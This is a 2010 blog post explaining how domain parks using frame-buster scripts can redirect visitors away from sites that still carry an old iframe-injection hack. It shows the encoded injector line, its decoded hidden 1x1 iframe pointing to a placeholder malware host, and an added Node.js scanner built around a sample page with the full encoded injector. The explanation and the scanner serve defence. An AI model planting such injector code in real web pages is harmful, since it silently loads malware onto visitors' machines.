Sunday, September 26, 2010

Domain Parks Hijacking Previously Hacked Sites?

Lately I've been seeing an increase in some domain parks using frame buster scripts and it really didn't make any sense to me.

Why would a domain park need a frame buster script?

Then I discovered a potential secret: these domain parks, whether intentionally or not, are inadvertently hijacking sites that were previously victims of the iframe injection hack!

Let's examine how this works.

The iframe injector exploit happens when a hacker adds a line of JavaScript to your page like this:

<script Language="Javascript">document.write(unescape('%3C%69%66%.....61%6D%65%3E'));</script>
That line of script decodes the escaped (percent-encoded) content passed to unescape() into something like this:
<iframe src="http://malware.location.example.com" width=1 height=1></iframe>

Once the search engines or browsers detect this problem, the victim's site gets the normal safe-surf malware warnings when visitors attempt to view its pages, for as long as malware continues to exist on http://malware.location.example.com. However, once the malware is removed, the domains that hosted it are often shut down or abandoned and return to a domain park. With no malware left at http://malware.location.example.com, the safe-surf warnings stop and everything looks normal again. Therefore, webmasters who never knew their sites were hacked in the first place, and never fixed the problem, are now potentially at the mercy of any domain park that employs frame busting.

If you didn't follow that, let's simplify it:

Some of the domain parks now add a FRAME BUSTER SCRIPT to their domain park pages.

Now any time a visitor goes to a site that was previously hacked and never repaired, the browser executes that JavaScript iframe injector code, and the frame buster in the parked page redirects the visitor from the victim's site to the domain park page.

You can see the frame buster script in the domain park pages:
function EscapeBrowserFrame(){ .... }
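As an added example (not code from the original post), here is a small Node.js scanner a webmaster could run over saved page HTML to find the leftover document.write(unescape('...')) injector and see which iframe it writes, without ever loading that iframe. The sample page is constructed and uses the post's placeholder malware domain.

```javascript
// Added example, not from the original post. Finds the
// document.write(unescape('...')) injector in saved page HTML, decodes the
// escaped literal the same way unescape() would, and reports any iframe it
// writes so a webmaster can spot the leftover injection without loading it.

const INJECTOR_RE = /document\.write\(\s*unescape\(\s*(['"])([^'"]*)\1\s*\)\s*\)/g;
const IFRAME_RE = /<iframe\b([^>]*)>/gi;

// Pull one attribute value (quoted or bare) out of an iframe's attribute string.
function attr(attrs, name) {
  const re = new RegExp('\\b' + name + '\\s*=\\s*(?:"([^"]*)"|\'([^\']*)\'|([^\\s>]+))', 'i');
  const m = re.exec(attrs);
  return m ? (m[1] ?? m[2] ?? m[3]) : null;
}

function findInjectedIframes(html) {
  const findings = [];
  for (const m of html.matchAll(INJECTOR_RE)) {
    // unescape() decodes %XX sequences; the injected script calls it before
    // document.write, so this yields exactly the markup it would add.
    const decoded = unescape(m[2]);
    for (const f of decoded.matchAll(IFRAME_RE)) {
      const w = attr(f[1], 'width');
      const h = attr(f[1], 'height');
      findings.push({
        src: attr(f[1], 'src'),
        // 1x1 (or smaller) frames are invisible to the visitor, the hallmark
        // of the injection described in the post.
        hidden: (w !== null && Number(w) <= 1) || (h !== null && Number(h) <= 1),
        markup: decoded,
      });
    }
  }
  return findings;
}

// Constructed sample page carrying the injector; the escaped string decodes to
// <iframe src="http://malware.location.example.com" width=1 height=1></iframe>
const SAMPLE_HTML = `<html><body><h1>My site</h1>
<script Language="Javascript">document.write(unescape('%3C%69%66%72%61%6D%65%20src%3D%22http%3A//malware.location.example.com%22%20width%3D1%20height%3D1%3E%3C/iframe%3E'));</script>
</body></html>`;

function scanSamplePage() {
  return findInjectedIframes(SAMPLE_HTML);
}

for (const f of scanSamplePage()) {
  console.log(`${f.hidden ? 'HIDDEN' : 'visible'} iframe -> ${f.src}`);
}
```

Any hit whose src points at a domain you do not control is a line the hacker left behind and should be removed from the page, whether or not the safe-surf warnings are still showing.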
To add insult to injury, innocent webmasters were not only victims of hackers, but now they're the unwitting victims of having their sites hijacked by domain parks!

A nice double whammy!

Many sites have been hacked by server-wide exploits which have been documented previously in this very blog. It's very possible (most likely) the hosts never reported the problem to their customers so the website owners never knew they needed to fix their pages. This situation has probably left literally tens of thousands of sites vulnerable over time to being eventually hijacked.

The real kicker here is that the domain used to distribute the malware could fall into a domain park at any time. Maybe the victim's site will be hijacked today, maybe tomorrow, maybe a year from now, but the potential risk is great. If that line of JavaScript left by the hacker is allowed to stay in the victim's website and the hacker's domain eventually falls into the right domain park, the victim's site will be hijacked too.

Iframe injector scripts: the hacker's gift that just keeps on giving!